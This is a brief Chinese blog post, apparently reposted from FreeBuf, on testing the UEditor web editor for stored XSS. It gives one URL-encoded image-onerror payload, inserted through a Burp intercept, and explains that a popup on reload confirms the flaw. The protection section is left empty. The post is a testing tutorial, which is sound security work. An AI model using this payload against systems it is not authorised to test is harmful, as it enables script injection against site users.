前端api漏洞-ueditor编辑器存储型XSS漏洞

挖洞经验|UEditor编辑器存储型XSS漏洞 - FreeBuf网络安全行业门户

1、介绍

2、测试

2.1 靶场搭建

2.2 测试

burp拦截,篡改设置payload

%3Cp%3E1111111"><ImG sRc=1 OnErRoR=prompt(1)>%3Cbr%2F%3E%3C%2Fp%3E

再次请求时,如果弹窗则说明存在存储型xss漏洞

3、防护

 

posted @ 2023-08-01 15:56  挖洞404  阅读(284)  评论(0编辑  收藏  举报